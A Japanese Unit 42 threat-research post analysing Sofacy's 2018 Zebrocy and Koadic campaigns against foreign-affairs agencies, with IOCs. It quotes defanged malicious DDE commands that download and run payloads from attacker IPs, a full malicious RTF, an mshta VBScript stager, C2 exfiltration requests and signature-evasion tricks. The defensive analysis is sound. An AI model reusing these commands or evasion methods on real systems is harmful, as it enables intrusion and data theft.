[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-groups-parallel-attacks/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# Sofacyグループの並列攻撃

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Bryan Lee](https://unit42.paloaltonetworks.com/ja/author/bryanlee/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2018年6月6日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [国家支援型サイバー攻撃](https://unit42.paloaltonetworks.com/ja/category/nation-state-cyberattacks-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [AutoIT](https://unit42.paloaltonetworks.com/ja/tag/autoit-ja/)
  * [Carberp](https://unit42.paloaltonetworks.com/ja/tag/carberp-ja/)
  * [DealersChoice](https://unit42.paloaltonetworks.com/ja/tag/dealerschoice-ja/)
  * [Ministry of Foreign Affairs](https://unit42.paloaltonetworks.com/ja/tag/ministry-of-foreign-affairs-ja/)
  * [Sofacy](https://unit42.paloaltonetworks.com/ja/tag/sofacy-ja/)
  * [Zebrocy](https://unit42.paloaltonetworks.com/ja/tag/zebrocy-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-groups-parallel-attacks/?pdf=download&lg=ja&_wpnonce=7570bbad6f "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-groups-parallel-attacks/?pdf=print&lg=ja&_wpnonce=7570bbad6f "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Sofacyグループの並列攻撃&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-groups-parallel-attacks%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-groups-parallel-attacks%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-groups-parallel-attacks%2F&title=Sofacyグループの並列攻撃 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-groups-parallel-attacks%2F&text=Sofacyグループの並列攻撃 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-groups-parallel-attacks%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Sofacyグループの並列攻撃%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-groups-parallel-attacks%2F "Share in Mastodon")

## **概要**

Sofacyグループは、依然としてグローバルな脅威として存在しています。Unit 42およびその他の機関は、2018年上半期に、この脅威グループが特に北米とヨーロッパの政府機関、外交機関、およびその他の戦略的組織を中心として、いかにして世界中の複数の組織を引き続き標的にしているかを示しました。

[2018年2月](https://blog.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/)と[3月](https://blog.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/)のSofacyについての最新の調査に続いて、Sofacyグループに起因する、あまり知られていないツール(Zebrocy)を使用した新しいキャンペーンを発見しました。Zebrocyは、主にマクロが含まれた悪意のあるMicrosoft Office文書や単純な実行可能ファイルの添付によるフィッシング攻撃を介して配信されます。この3番目のキャンペーンは、標的が外交を取り扱う政府組織という点では、以前報告された2つの攻撃キャンペーンと一致しています。ただし、今回のケースでは、標的の地政学的領域が異なっていました。

最新のキャンペーンで判明した興味深い相違点は、Zebrocyを使用した攻撃では、標的の組織内ではるかに幅広い対象を標的としていることです。攻撃者は、非常に数多くの個人に対してフィッシングメールを送信しています。標的となった個人は、特定のパターンに一致しているわけではなく、Web検索エンジンを使用すると簡単に見つかる電子メールアドレスでした。これは、1つの組織の一握りの被害者を標的として、集中攻撃を行うことが一般的な、Sofacyグループ関連の他の攻撃とはまったく対照的です。

大量のZebrocy攻撃を発見したことに加え、マカフィーが[以前報告した](https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/)[動的データ交換(DDE)](https://en.wikipedia.org/wiki/Dynamic_Data_Exchange)エクスプロイト技法を活用したSofacyグループのインスタンスも観察されました。観察されたインスタンスは、DDEエクスプロイトを使用して、以前観察されたペイロードとは異なるペイロードを配信します。あるインスタンスでは、Zebrocyの配信とインストールにDDE攻撃が使用されました。別のインスタンスでは、DDE攻撃は[Koadic](https://github.com/zerosum0x0/koadic)と呼ばれるオープンソースの侵入テストツールキットの配信に使用されました。Sofacyグループは、過去にもオープンソースや無料で利用できるツールやエクスプロイトを利用しましたが、Unit 42がKoadicツールキットの利用を観察したのは今回が初めてです。

### **以前の攻撃との関連性**

2月のレポートでは、Sofacyグループが悪意のあるマクロが含まれたMicrosoft Office文書を使用して、[SofacyCarberp](https://blog.paloaltonetworks.com/tag/carberp/)ペイロードを複数の政府機関に配信したことを発見しました。このレポートでは、Sofacyグループが攻撃ごとに無作為の登録者とサービスプロバイダ情報を使用することでインフラストラクチャの属性を隠すために、従来の難読化技法を使用しているとみられるという観察結果を説明しました。特に、Sofacyグループが各ドメインにWebページを配置したことを指摘しています。攻撃者がC2インフラストラクチャ上に実際のWebページをセットアップすることはほとんどないため、これは奇妙です。さらに奇妙なことには、それぞれのWebページの本文には、同じコンテンツが含まれていました。このレポート以降も、このおかしな点について調査を継続しました。このアーティファクトを使用して調査を進めることで、2月に確認された被害に類似した[DealersChoice](https://blog.paloaltonetworks.com/tag/dealerschoice/)エクスプロイトによる別の攻撃キャンペーンを発見することができました。このアーティファクトを継続して使用することで、同じコンテンツの本文を持つ別のドメイン(supservermgr\[.\]com)を発見しました。このドメインは2017年12月20日に登録され、数日後に、Sofacyグループが頻繁に使用している既知のVPSプロバイダに属する92.222.136\[.\]105に解決されました。

残念なことに、このC2ドメインは、サンプル収集時点でサードパーティによってシンクホール化されていました。それでも、supservermgr\[.\]comに関連付けられたマルウェアサンプルに対する動的および静的な分析に基づき、複数の固有のアーティファクトを特定することができました。これにより、当社のデータセットが拡大し、さらなる発見を確認することができました。最初に、収集したサンプルの[d697160ae](#post-104832-付録)\[CB1\] ...が、hxxp://supservermgr\[.\]com/sys/upd/pageupd.phpにあるC2と通信してZebrocy [AutoIT](https://en.wikipedia.org/wiki/AutoIt)ダウンローダーを取得しようとしていることを特定しました。ドメインはシンクホール化されている\[AK2\] ため、アクティビティを完了することはできませんでした。それでも、C2通信に使用された、次に示す固有のハードコードされたユーザー エージェントを特定することができました。

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)

AutoFocusを使用し、ユーザー エージェント文字列を手がかりに、まったく同じユーザー エージェントを使用する3つの追加のZebrocyサンプルにデータセットが拡大しました。これが、185.25.51\[.\]198および185.25.50\[.\]93にあるZebrocyの追加のインフラストラクチャにつながりました。この時点で、元のサンプルと関連するC2ドメインに関して30近くのZebrocyのサンプルを収集しました。このマルウェアファミリ固有のアーティファクトに基づき、さらに調査を進めることで、データセットが過去数年間に使用された数百のサンプルに拡大しました。追加のサンプルのほとんどは、[ESET](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/)で以前報告されたDelphiおよびAutoITの亜種でした。ただし、収集したサンプルのいくつかは、Zebrocyダウンローダー ツールのC++亜種でした。また、完全に異なるKoadicのペイロードが配信されている証拠も発見しました。さらに、ESETのレポートでこれらの攻撃における最終段階のペイロードと述べられている、DelphiバックドアのC2サービスをホストするIPアドレス185.25.50\[.\]93も見つかりました。

以下に、実施した関係分析を図示したMaltegoグラフを示します。

*![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-273.png)*

*図1 関連性の視覚化*

これは、収集できたすべてのZebrocyおよびKoadicサンプルの包括的なグラフではないことに注意してください。言及したサンプルまたは関連分析に関係しているサンプルのみが含まれています。

185\.25.50\[.\]93というC2のIPから、Zebrocyによって使用されている、次に示すハードコードされた別のユーザー エージェントが見つかりました。

Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko

中央アジアの大国の外務省を標的とし、このユーザー エージェントを使用しているZebrocyのいくつかのサンプルを観察しました。このアーティファクトを足場として調べたところ、追加のZebrocyサンプルが得られました。特にサンプルの1つ、[cba5ab65a](#post-104832-付録)\[CB3\] ...は、C2の以前のユーザー エージェントと組み合わせて別の固有のユーザー エージェント文字列を使用していました。

Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1

2つの個別の固有なユーザー エージェント文字列を使用しているマルウェアサンプルは、一般的ではありません。ツールの詳細な調査から、2番目のユーザー エージェント文字列は、[cba5ab65a...](#post-104832-付録)サンプルによって取得された2番目のペイロードからのものであることが明らかになりました。Mozilla v5.1ユーザー エージェントを足場とすることで、40以上の追加のZebrocyサンプルが判明しました。ここでも、いくつかは同じ中央アジアの国を標的としていました。特に2つのサンプル、[25f0d1cbc...](#post-104832-付録)と[115fd8c61...](#post-104832-付録)から追加のアーティファクトが得られ、私たちはそれを足場として、ZebrocyおよびKoadicを配信するための兵器化されたドキュメントを検出することができました。

固有のユーザー エージェントの文字列の使用を経時的に調べると、以前はMozilla/5.0ユーザー エージェントのみが使用されていましたが、2017年中盤以降は、3つのユーザー エージェント文字列がすべて、ZebrocyツールによってC2通信用に使用されていることがわかります。

*![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-76.jpeg)*

*図2 ユーザー エージェントの経時的な変化*

### **DDEドキュメント**

DDEを活用して検出された2つの兵器化されたドキュメントは、被害者学と戦略の変化の点で特に興味深いものでした。

私たちは[25f0d1cbc...](#post-104832-付録)を調べているときに、そのC2 220.158.216\[.\]127を足場として、追加のZebrocyサンプルと兵器化されたドキュメントを収集できました。このドキュメント(85da72c7d...)は、外交問題を扱う北米の政府組織を標的としていたようです。それは、DDEを活用して、ペイロードを取得し、感染ホストにインストールしていました。この攻撃では、ウズベキスタン共和国に関して国連から公に入手可能なドキュメントを装ったコンテンツとともに、おとりドキュメントが展開されます。

*![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-77.jpeg)*

*図3 配信ドキュメントの例*

*![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-78.jpeg)*

*図4 使用されたルアー(わな)のイメージ*

兵器化されたドキュメントの作成者は、すべてのおとりコンテンツの後のドキュメントの末尾にDDE命令を追加しました。ドキュメントがWordで開かれた時点では、Wordはデフォルトでこれらのフィールドのコンテンツを表示しないため、命令は即座には表示されません。以下のスクリーンショットからわかるとおり、DDE命令が存在する行をハイライトしても表示されません。

*![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-79.jpeg)*

*図5 隠されたDDEコマンド*

\[フィールドコードの表示/非表示\]機能を有効にすると、DDE命令が現れ、作成者が命令をサイズ1フォントで、白色に設定していたことがわかります。白色のフォントを使用して、コンテンツを兵器化されたドキュメント内に隠す方法は、悪意のあるマクロ攻撃でSofacyグループによって使用されていた、私たちが[以前に報告した](https://blog.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/)手法です。

DDE命令は、感染ホストで以下のコマンドの実行を試みます。これらのコマンドは、リモートサーバーからのペイロードのダウンロードと実行を試みます。  
C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\ System32\\\\rundll32.exe C:\\\\Windows\\\\System32\\\\shell32.dll,ShellExec\_RunDLL C:\\\\Windows\\\\System32\\\\cmd.exe /k certutil -urlcache -split -f hxxp://220.158.216\[.\]127/MScertificate.exe \& MScertificate.exe"

|-----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\ System32\\\\rundll32.exe C:\\\\Windows\\\\System32\\\\shell32.dll,ShellExec\_RunDLL C:\\\\Windows\\\\System32\\\\cmd.exe /k certutil -urlcache -split -f hxxp://220.158.216\[.\]127/MScertificate.exe \& MScertificate.exe" |

分析中、このDDEが Zebrocy AutoItダウンローダー(f27836430...) をダウンロード後に実行し、さらに 220.158.216\[.\]127からの追加ペイロードのダウンロード・実行を試みるように設定されていることがわかりました。また、DDE命令には、それが実行しなかった別のコマンドも含まれていました。それは、この配信ドキュメントの以前のバージョンのアーティファクトであることを示唆しています。以下はこの未使用のコマンドを示しています。このコマンドから、Sofacyのインフラストラクチャ内の追加サーバーが92.114.92\[.\]102からエンコード化されたPowerShellスクリプトをダウンロードし実行していたことが露見しました。  
C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\ System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -W hidden $e=(New-Object System.Net.webClient).downloadString('hxxp://92.114.92\[.\]102:80/d');po wershell -enc $e #

|-----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\ System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -W hidden $e=(New-Object System.Net.webClient).downloadString('hxxp://92.114.92\[.\]102:80/d');po wershell -enc $e # |

上記の未使用のコマンドは、[McAfee](https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/)と[ESET](https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/)によって述べられたとおり、以前の攻撃、特に、2017年11月に発生した攻撃に関係しているようです。DDEが有効なドキュメントを使用したこれらの2017年11月の攻撃で配信されたペイロードは、SofacyCarberpでした。これは、2018年2月の攻撃で配信されたZebrocyダウンローダーとは異なります。

[115fd8c61...](#post-104832-付録)は、もう1つのZebrocyサンプルで、私たちはそれを足場として、そのC2 である 86.106.131\[.\]177に接続している追加のサンプルを収集することができました。追加のサンプルは、前述の同じ中央アジアの大国を標的としていましたが、さらに興味深いことに、サンプルの1つは、DDEを活用し、Zebrocy以外のペイロードを含む兵器化されたドキュメントでした。このペイロードは、最終的にKoadicと呼ばれるオープンソースのペネトレーションテスト用ツールキットであることがわかりました。それは、MetasploitやPowerShell Empireによく似たツールキットで、Github上で誰でも無料で入手可能です。

*![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-80.jpeg)*

*図6 配信ドキュメントの例*

RTFドキュメント(8cf3bc2bf...)は、サイズが264バイトと非常に小さく、その全体は以下のとおりです。  
{\\rtf1{\\field{\\\*\\fldinst DDEAUTO "C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe " "/C POWErsHELl.eXE -ex BypaSs -NOP -w HIdDen (NEw- oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp://86.106.131\[.\]177/link/GRAPH.EXE' , '%apPDAtA%\\graph.exe' ) ; saps '%Appdata%\\graph.exe'"}}}

|-------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | {\\rtf1{\\field{\\\*\\fldinst DDEAUTO "C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe " "/C POWErsHELl.eXE -ex BypaSs -NOP -w HIdDen (NEw- oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp://86.106.131\[.\]177/link/GRAPH.EXE' , '%apPDAtA%\\graph.exe' ) ; saps '%Appdata%\\graph.exe'"}}} |

上記のコンテンツは、Microsoft Word内でDDE機能を使用して、PowerShellスクリプトを実行し、リモートサーバーからKoadicペイロードをダウンロードして、それを実行可能ファイルとしてシステムに保存し、その後、ペイロードを実行します。

## **結論**

Sofacyグループは、2018年も標的型攻撃活動を継続しています。このブログで述べたとおり、Sofacyは、世界中の類似の標的を、異なるツールセットで攻撃するために並列して活動を展開しています。この現在の攻撃の種類に関連付けられたZebrocyツールは、開発者がツールを作成するために選択したプログラミング言語に基づき、複数の異なるフォームで構成されています。すでに、Delphi、AutoIt、およびZebrocyのC++亜種が観察されています。それらはすべて、機能が関連しているだけではありません。ときには、単一の攻撃内で亜種が互いに連結されて関連付けられていることもあります。これらの攻撃は、引き続き、スピアフィッシング活動を介して、または、以前に観察されたDDEエクスプロイト手法を使い、被害者がファイルを起動することを期待したシンプルな実行可能添付ファイルを介して、大規模に仕掛けられています。

パロアルトネットワークスのお客様は、以下によってZebrocyおよびKoadic攻撃から保護されています。

* すべての既知のZebrocyサンプルはWildFire内で悪意があると判断されます。
* AutoFocusをご使用のお客様は、以下のタグでこれらの活動を追跡できます。
  * [Zebrocy](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ZebrocyDownloader)
  * [Koadic](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Koadic)

## 付録

### **Zebrocy C++亜種**

2018年2月19日、ある中央アジアの国の外交機関にスピアフィッシング メールが送信されたことが観測されました。このメールは、Delphiプログラミング言語で作成されたZebrocyダウンローダー(5b5e80f63...)を添付ファイルとして配信しようとしていました。このダウンローダーは2次ダウンローダーを取得します。このケースでは、機能的にほぼ同じであるものの、DelphiではなくC++で作成されていました。

Zebrocyダウンローダーのこの亜種は、まずラベル「C:\\」のストレージ ボリュームのシリアル番号とコンピュータ名を収集します。次に、画面の右下隅に見えないウィンドウ(0x0ピクセル)を作成し、トロイの木馬のmain関数を呼び出します。

このトロイの木馬のmain関数は、構成済みのC2サーバーとやり取りして、実行用の追加コードを取得します。main関数は、対象の文字列を復号するためにswitch文内でcaseとしてサブ関数が使用する特定の番号でサブ関数を呼び出し、該当する文字列を取得して、C2と通信します。例として、各case文の最終的に復号された文字列を以下に示します(dd7e69e1...)。

#### Case - 復号された文字列

1 - 85.25.50\[.\]93

2 - POST http://185.25.50\[.\]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50\[.\]93\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length:

3 - porg=

4 - Content-Length:

トロイの木馬はRAWソケットを使用してC2サーバーと通信し、上記の復号された文字列を使用してHTTPリクエストを作成します。まず、1を引数としてこの特定のサブ関数を呼び出して、C2接続用のIPアドレスを取得します。次に2を引数としてサブ関数を呼び出して、HTTP POSTリクエストとして使用する文字列を取得します。そしてmain関数は、3を引数としてサブ関数を呼び出して、ボリューム シリアル番号とコンピュータ名とともにPOSTデータ パラメータ(「porg」)を取得して、このデータをHTTP POSTリクエストを介してC2に送ります。結果として、HTTP POSTリクエストは以下のようになります。

POST http://185.25.50\[.\]93/syshelp/kd8812u/protocol.php HTTP/1.1

Host: 185.25.50\[.\]93

Content-Type: application/x-www-form-urlencoded

Content-Length: 21

porg=44908AE0524f422d

弊社の分析時に弊社のリクエストにC2サーバーが応答することは確認できませんでしたが、トロイの木馬が特定のデータを探してC2の応答を解析することがわかっています。

\-1 - Deletes the buffer and exits the Trojan.

009 - Deletes the buffers and exits the Trojan.

HTTP応答の先頭に上記のどちらの値も見つからない場合、トロイの木馬は、16進バイトのASCII表記がないかC2応答をチェックします。トロイの木馬は、これらの16進バイトをバイナリ値に変換し、ファイルに書き込んで、ShellExecuteW API関数を使用して「open」関数によってファイルを実行します。

以下のHTTP POSTパラメータがZebrocy C++サンプル内に確認されています。

porg

structOne

oq

volume

#### **DDEの詳細**

2018年2月の攻撃で使用されたDDEドキュメントの作成者は、いくつかの難読化技法を試みて検出を回避しようとしました。第一に、DDE命令は、QUOTEフィールドに大きく依存しており、これは、10進値を等価の ASCII文字列に変換します。また、作成者は、大文字小文字を区別するシグネチャを回避するために「dde」コマンドで「E」を大文字にしました。最後に、作成者は、「dde」コマンド内の「dd」文字を太字にして、DOCXファイルのXML(word/document.xml)内の文字列を崩して、シグネチャ開発を困難にしようとしました(以下参照)。  
\<w:r w:rsidRPr="00E84CED"\> \<w:rPr\> \<w:b/\> \<w:noProof/\> \<w:color w:themeColor="background1" w:val="FFFFFF"/\> \<w:sz w:val="2"/\> \<w:szCs w:val="2"/\> \</w:rPr\> \<w:instrText\>dd\</w:instrText\> \</w:r\> \<w:r w:rsidRPr="00E84CED"\> \<w:rPr\> \<w:color w:themeColor="background1" w:val="FFFFFF"/\> \<w:sz w:val="2"/\> \<w:szCs w:val="2"/\> \</w:rPr\> \<w:instrText xml:space="preserve"\>E \</w:instrText\> \</w:r\>

|----------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | \<w:r w:rsidRPr="00E84CED"\> \<w:rPr\> \<w:b/\> \<w:noProof/\> \<w:color w:themeColor="background1" w:val="FFFFFF"/\> \<w:sz w:val="2"/\> \<w:szCs w:val="2"/\> \</w:rPr\> \<w:instrText\>dd\</w:instrText\> \</w:r\> \<w:r w:rsidRPr="00E84CED"\> \<w:rPr\> \<w:color w:themeColor="background1" w:val="FFFFFF"/\> \<w:sz w:val="2"/\> \<w:szCs w:val="2"/\> \</w:rPr\> \<w:instrText xml:space="preserve"\>E \</w:instrText\> \</w:r\> |

前述のDOCXファイルに加えて、Zebrocy C2 IPアドレスとのインフラストラクチャの重複に基づいて、関連した別のDDEが有効なドキュメントを発見しました。この関連した配信ドキュメントは、RTFファイルで、オープンソースKoadicツールのロードに使用されるペイロードをダウンロードしてインストールしていました。弊社は標的または攻撃ベクトルに対してテレメトリを有していませんが、RTFファイルがDDEを使用してKoadicをロードする実行ファイルをダウンロードして実行することは知っています。

ペイロード(abbad7acd...)は、実行ファイルで、ある VBScript からExecutableに変換するツールで作成され、さらにクリプターによって難読化されているようです。弊社の分析では、[F2KO Software](https://www.f2ko.de/en/index.php)の提供するVbs to Exeツールとの結びつきが考えられますが、いまのところ直接的な一致は確認されていません。攻撃者は、リソース内からファイル名とスクリプトを取得し、各バイトを -1で乗算することによってこれらのリソースをデコードしていることから、ペイロードでクリプターを使用したと弊社は確信しています。次にペイロードは、ハードコードされたSHA1ハッシュ(B6A75B1EF701710D7AEADE0FE93DE8477F3BD506)のように見える、MD5ハッシュ(14331d289e737093994395d3fc412afc)を、RC4キーとして使用し、最終的なデコードされたデータを復号します。例えば、以下のデータがリソースに存在します。

fb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f

各バイトを-1で乗算することで、以下のデータを得ます。

05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1

RC4およびキー、14331d289e737093994395d3fc412afcを使用すると、以下の平文データのようになります。

\\x00\\x00\\x00\\x00FlashRun.vbs

このFlashRun.vbsファイル名を使用したペイロードは観測されておらず、一時的なファイル名を使用して、埋め込まれたVBScriptファイルを格納しています(%Temp%\\4.tmp\\5.vbsなど)。埋め込まれたVBScriptは、リソースから取得され、上記と同じアルゴリズムを使用して復号され、以下のような平文になります。  
set objshell = createobject(\\"wscript.shell\\") objshell.run \\"mshta hxxp://86.106.131.177:6500/zIZFh\\",vbhide

|-----|-------------------------------------------------------------------------------------------------------------------|
| 1 2 | set objshell = createobject(\\"wscript.shell\\") objshell.run \\"mshta hxxp://86.106.131.177:6500/zIZFh\\",vbhide |

Koadic C2サーバーは、Koadicステージング ペイロードとしての役割を果たすJavascriptコードで、このリクエストに応答します。これにより、攻撃者は、エンド システム上で追加のKoadicモジュールを実行して、エクスプロイト後の活動を実行します。残念ながら、弊社の分析時には、Sofacyによる、このKoadicモジュールの使用は観測できませんでした。

## IOC

### ドメイン

supservermgr\[.\]com

### URL

hxxp://supservermgr\[.\]com/sys/upd/pageupd.php

### Zebrocy

d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc  
cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df  
25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8  
115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03  
f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1  
5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2  
dd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d

### Koadic

abbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca

### User-Agent

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)

Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko

Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1

### IPアドレス

185\.25.51\[.\]198  
185\.25.50\[.\]93  
220\.158.216\[.\]127  
92\.114.92\[.\]102  
86\.106.131\[.\]177  
85\.25.50\[.\]93  
86\.106.131\[.\]177

### DDE Doc

85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5  
8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff
トップに戻る

### タグ

* [AutoIT](https://unit42.paloaltonetworks.com/ja/tag/autoit-ja/ "AutoIT")
* [Carberp](https://unit42.paloaltonetworks.com/ja/tag/carberp-ja/ "Carberp")
* [DealersChoice](https://unit42.paloaltonetworks.com/ja/tag/dealerschoice-ja/ "DealersChoice")
* [Ministry of Foreign Affairs](https://unit42.paloaltonetworks.com/ja/tag/ministry-of-foreign-affairs-ja/ "Ministry of Foreign Affairs")
* [Sofacy](https://unit42.paloaltonetworks.com/ja/tag/sofacy-ja/ "Sofacy")
* [Zebrocy](https://unit42.paloaltonetworks.com/ja/tag/zebrocy-ja/ "Zebrocy")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:ナイジェリア発ビジネスメール詐欺の台頭](https://unit42.paloaltonetworks.com/ja/unit42-silverterrier-update-increasingly-sophisticated-nigerian-cybercriminals-take-bigger-part-3b-bec-related-losses/ "ナイジェリア発ビジネスメール詐欺の台頭")

### 目次

* 

### 関連記事

* [Clickを修正: ClickFix攻撃ベクターを阻止せよ](https://unit42.paloaltonetworks.com/ja/preventing-clickfix-attack-vector/ "article - table of contents")
* [DarkGate: Excel ルアーから公開 Samba へつづく感染チェーンと回避戦術の分析](https://unit42.paloaltonetworks.com/ja/darkgate-malware-uses-excel-files/ "article - table of contents")
